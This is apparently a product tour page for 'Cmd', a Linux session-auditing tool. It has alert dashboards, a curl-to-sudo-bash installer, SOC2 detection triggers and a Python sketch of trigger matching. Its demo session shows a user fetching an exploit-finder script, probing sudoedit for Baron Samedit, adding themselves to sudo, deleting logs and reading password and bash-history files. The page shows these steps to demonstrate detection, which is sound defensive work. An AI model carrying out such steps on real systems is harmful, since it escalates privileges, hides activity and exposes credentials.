
Top 5 users by alerts (Past Month)
izabela.crowther
omari.akhtar
jayden.garrison
sama.boyce
harmony.whitehouse

Alerts by cities
New York City: 640
Washington, D.C: 298
Mountain View: 24
Council Bluffs: 1

Servers by alert volume (Past Month)
node-3.us-east-1.acme.com: 443
staging.us-east-2.acme.com: 382
production.us-east-1.acme.com: 113
staging.us-west-1.acme.com: 18
production.us-west-2.acme.com: 6
staging.us-central-1.acme.com: 1

Notices (Past Month)
SOC2 - Generic Ownership/Permission Modification: 403
SOC2 - Security Control Interaction: 319
Sudo Exec Meme: 116
SOC2 - Package Install/Removal: 48
SOC2 - Listening Service State Change: 13
SOC2 - Abnormal Service User Child Process: 4

Alerts (Past Month)
SOC2 - User Account Modification: 27
Block action for Root: 21
Kernel Runtime Modification: 18
SOC2 - Cmd Audit Agent Probe Tampering: 13
Cmd - SOC2 - Cmd Audit/Control Agent Disconnected Events Deletion: 11
Cmd - SOC2 - Cmd Audit/Control Security Control Information Discovery: 6

All Users by Session Count (Past Month)
omari.akhtar: 475
elysia.winter: 471
izabela.crowther: 460
mehreen.stewart: 457
patsy.mackay: 456
shazia.leblanc: 456
kristy.douglas: 456
wojciech.larson: 454
harlow.jenkins: 452
leonidas.garrison: 451
dawood.norris: 450
sama.boyce: 448
whitney.ashley: 448
jayden.garrison: 448
nyle.humphrey: 447
ritik.scott: 446
drake.marin: 446
emmanuella.haney: 446
esha.campos: 440
kristen.chester: 440

# Install Cmd on your Linux hosts

Installing a Cmd agent on a single host is as simple as copying and pasting a one-line script.

~ Demo Linux machine terminal ~

michaels@test-machine:~$ curl -s -f https://sub2.c‑app.cmd.com:443/install/50e2caff524ccc37ea91ecd9759d4e1fa5e746c272b489d7d2b68e7cf81a41d767335e774c7ed99cb09a14b094ebe629316fefe9d27358182522b1d9374e2684/PRJ-92LP/U2VydmVy/Staging | sudo bash
>_ Starting Cmd installation
>_ Detected ubuntu
>_ Downloading Cmd
>_ Installing Cmd
(Reading database ... 87370 files and directories currently installed.)
Preparing to unpack /tmp/amd64.deb ...
Unpacking ccf (1.4.0) over (1.4.0) ...
Setting up ccf (1.4.0) ...
>_ Configuring Cmd
>_ Starting Cmd Agent
>_ Completed Cmd installation
michael@test-machine:~$

# Observing a privilege escalation vulnerability

Our web app's session view allows you to keep a close eye on any interaction with your servers, and helps highlight potential indicators of compromise.

bash started by omari.akhtar
/home/omari.akhtar $ whoami
/home/omari.akhtar $ id
/home/omari.akhtar $ sudo whoami
Exec user change: root
/home/omari.akhtar $ curl -s -f example.com/exploitfinder.sh
/home/omari.akhtar $ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
stderr
/home/omari.akhtar $ dash /tmp/samedit.sh
/home/omari.akhtar $ sudo sh
Exec user change: root
/home/omari.akhtar $ dash
/home/omari.akhtar $ usermod -aG sudo omari.akhtar
SOC2 - User Account Modification
User account modification may introduce additional risk to a system or be a result of attacker behaviour. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Condition when command runs:
cmd_root IN 'adduser,addgroup,chsh,groupadd,groupmod,passwd,useradd,usermod' AND cmd_parameters NOT IN '*bin/nologin*,*bin/false*'
/home/omari.akhtar $ rm -fr /var/log/messages.log
/home/omari.akhtar $ tail -n 10
/home/omari.akhtar $ last
/home/omari.akhtar $ cat /etc/passwd
/home/omari.akhtar $ grep --color=auto emmanuel
/home/omari.akhtar $ last
/home/omari.akhtar $ grep --color=auto izabela
/home/omari.akhtar $ last
/home/omari.akhtar $ sudo su
Exec user change: root
/home/omari.akhtar $ su
/home/omari.akhtar $ bash
/home/omari.akhtar $ su emmanuella.haney
Exec user change: emmanuella.haney
/home/omari.akhtar $ bash
/home/omari.akhtar $ cd /home/emmanuella.haney/
/home/emmanuella.haney $ grep --color=auto ssh
/home/emmanuella.haney $ cat /home/emmanuella.haney/.bash_history
/home/emmanuella.haney $ sudo su -
Exec user change: root
/home/emmanuella.haney $ su -
/root $ bash
/root $ su izabela.crowther
Exec user change: izabela.crowther
/root $ bash
/root $ cd /home/izabela.crowther/
/home/izabela.crowther $ grep --color=auto password
/home/izabela.crowther $ cat /home/izabela.crowther/.bash_history

Command details
Date: Feb 24, 2:36 AM (UTC)
Exec user: root
Executable path: /usr/sbin/usermod
Parent command: dash

Process details
SID: 22814
PID: 22839
PPID: 22838
PGID: 22839

Session details
PID: 22814
Date connected: Feb 24, 2:36 AM (UTC)
Status: Session ended
User IP: 35.225.224.99 (External)
Duration: 00:01:28
Entry mechanism: ssh
Interactive: Yes
Cmd version: 1.4.9

Environment variables
PATH = /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

Alert details (1)
Command alerts (1)
Group: SOC2
Actions:

Server details
Hostname: demo-node-3
OS: Linux demo-node-3 4.15.0-1077-gcp #87~16.04.1-Ubuntu SMP Sat…
IPs: 127.0.0.1, 10.128.0.12
Date added: Apr 18, 2020, 11:07 PM (UTC)
Sessions: 189,663
Commands: 20,144,797
Alerts: 414,114

Trigger activity (Past Week)
[Chart: trigger activity, Feb 16 to Feb 23; y-axis 0 to 100]

Triggers by risk level (Past Week)
1 - Low: 1
2 - Medium: 0
3 - High: 1
4 - Very high: 2
5 - Critical: 2
Total: 6

Top alerts (Past Week)
SOC2 - Generic Ownership/Permission Modification: 254
SOC2 - Security Control Interaction: 49
Block action for Root: 2

Triggers
Archived
12 Triggers       
Block action for Root
No description
Command
Feb 22, 11:06 PM (UTC)
Feb 22, 11:06 PM (UTC)
SOC2 - Security Control Interaction
Interaction with enabled security controls may impact the effectiveness of the controls in place. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:34 PM (UTC)
Jan 15, 7:34 PM (UTC)
SOC2 - Package Install/Removal
Installation or removal of system or user isolated packages may reduce functionality or adversely modify the behaviour of the system. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:34 PM (UTC)
Jan 15, 7:34 PM (UTC)
SOC2 - Listening Service State Change
Manual state change of external or internal listening services may result in abnormal system behaviour or adversely impact service availability. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:33 PM (UTC)
Jan 15, 7:33 PM (UTC)
SOC2 - Abnormal Service User Child Process
During normal operation it is rare that listening services providing web or backend services launch shell child processes and occurrences warrant further investigation. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:32 PM (UTC)
Jan 15, 7:32 PM (UTC)
SOC2 - Generic Ownership/Permission Modification
File ownership or permission changes may impact the current configured DACL policies on a given instance. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:32 PM (UTC)
Jan 15, 7:32 PM (UTC)
SOC2 - Suspicious Ownership/Permission Modification
Abnormal ownership or permissions may render sensitive information on a system accessible to parties that should not have access or may be the result of attacker behaviour for introducing mechanisms useful for privilege escalation in subsequent sessions. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:31 PM (UTC)
Jan 15, 7:31 PM (UTC)
SOC2 - User Account Modification
User account modification may introduce additional risk to a system or be a result of attacker behaviour. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:48 PM (UTC)
Jan 15, 7:30 PM (UTC)
SOC2 - Kernel Runtime Modification
Loading or unloading kernel modules may adversely impact the security or availability of the current running system. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1. Additionally supports CC5.1, CC5.2 and CC5.3 with Cmd Control and a configured Block action.
Command
SOC2
Jan 15, 7:48 PM (UTC)
Jan 15, 7:26 PM (UTC)
SOC2 - Cmd Audit Agent Probe Tampering
Modification of downloaded probes could cut off visibility for the Cmd Audit product. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:24 PM (UTC)
Cmd - SOC2 - Cmd Audit/Control Agent Disconnected Events Deletion
Deletion of the offline events database can prevent visibility into events observed during instances of network connectivity issues. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:22 PM (UTC)
Cmd - SOC2 - Cmd Audit/Control Security Control Information Discovery
Discovery of installed observability software or internal cryptographic keys may indicate preparation for evasion attempts. Supports AICPA Trust Services Criteria (SOC-2) CC4.1, CC4.2, CC6.1, and CC7.1.
Command
SOC2
Jan 15, 7:42 PM (UTC)
Jan 15, 7:22 PM (UTC)
Add trigger
query

My first test trigger

My first test trigger to see how Cmd alerts and notifications work...

Conditions

cmd_root = 'sudoedit' AND cmd_parameters = '*-s'

When: Command run

When all of the following is true: sudoedit and *-s

Actions

Set alert
All triggers include an action to create an alert. Alerts set above level zero will need to be resolved.
Send Slack alert
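
A sketch of how the two trigger conditions shown on this page evaluate against commands from the demo session, added here as an illustration and not Cmd's own code. It assumes `*` is a shell-style wildcard matched against the whole parameter string and that `IN` means "matches any listed pattern"; under that assumption `*-s` only fires when `-s` is the last argument, so a pattern is worth testing against the argument strings you expect to see.

```python
from fnmatch import fnmatchcase
import os
import shlex

# Conditions copied from the page; the matching semantics are assumed.
ACCOUNT_ROOTS = "adduser,addgroup,chsh,groupadd,groupmod,passwd,useradd,usermod"
ACCOUNT_EXCLUDED = "*bin/nologin*,*bin/false*"


def split_command(line):
    """Split a command line into (cmd_root, cmd_parameters)."""
    tokens = shlex.split(line)
    if not tokens:
        return "", ""
    return os.path.basename(tokens[0]), " ".join(tokens[1:])


def glob_in(value, csv_patterns):
    """True if value matches any comma-separated shell-style pattern."""
    return any(fnmatchcase(value, p) for p in csv_patterns.split(","))


def user_account_modification(line):
    """cmd_root IN '<roots>' AND cmd_parameters NOT IN '<excluded>'."""
    root, params = split_command(line)
    return glob_in(root, ACCOUNT_ROOTS) and not glob_in(params, ACCOUNT_EXCLUDED)


def sudoedit_trigger(line, param_pattern="*-s"):
    """cmd_root = 'sudoedit' AND cmd_parameters = '<param_pattern>'."""
    root, params = split_command(line)
    return root == "sudoedit" and fnmatchcase(params, param_pattern)


def evaluate(lines, param_pattern="*-s"):
    """Return {command line: [names of triggers that fire]} for lines with a hit."""
    hits = {}
    for line in lines:
        fired = []
        if user_account_modification(line):
            fired.append("SOC2 - User Account Modification")
        if sudoedit_trigger(line, param_pattern):
            fired.append("My first test trigger")
        if fired:
            hits[line] = fired
    return hits


# Commands from the session shown on the page, plus constructed variants.
SESSION = [
    "whoami",
    "sudoedit -s /",
    "usermod -aG sudo omari.akhtar",
    "cat /etc/passwd",
    "useradd -r -s /usr/sbin/nologin svc-backup",  # constructed: service account
    "/usr/bin/sudoedit -s",                        # constructed: -s as last argument
]

if __name__ == "__main__":
    for pattern in ("*-s", "*-s*"):
        print(pattern, evaluate(SESSION, pattern))
```
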

More things you can do with Cmd

# Realtime data scrubbing

Protect your IP by scrubbing data before it leaves your servers.

# Reports

Visualize your data; discover and share key insights about how your infrastructure is used.

# Data export

Export data to your buckets for archiving, or integrate directly with SIEM apps.

# View live sessions in real-time

See what happens on your systems, from bare metal to the cloud.

@Bashee from Cmd

Welcome to Cmd Quick Tour!

In this quick tour we'll show you around Cmd and explain how everything works.

@Bashee from Cmd

# Cmd Terminal 2.0

It all starts with the agent installer.

Installing Cmd is a simple process. Unlike other system tracing and monitoring tools, Cmd doesn't require complex configuration.

You can manually install or orchestrate the deployment using Chef, Puppet, Ansible or any other configuration management application.

The collected data is presented in sessions view for quick and easy auditing of all executed commands.

Our Linux-based data model helps to contextualize each command and process in simple and intuitive ways.

Let's see how it works in this typical priv-esc from a shell that leverages Baron Samedit (CVE-2021-3156).

See the same session in: AuditD or Linux Shell

Create custom triggers with dozens of properties related to the process, session, and command.

Let's create a trigger to notify when engineers use the sudoedit command.

@Bashee from Cmd

Cmd starts collecting key data once the agent is installed. We focus on capturing the things that matter:

  • Interactive sessions
  • New processes
  • File changes
  • And more...
@Bashee from Cmd

Cmd provides a complete library of default triggers to help detect and prevent exploits and bad behavior on your system.

But every environment is different, so you can create a custom trigger that fits your specific needs.
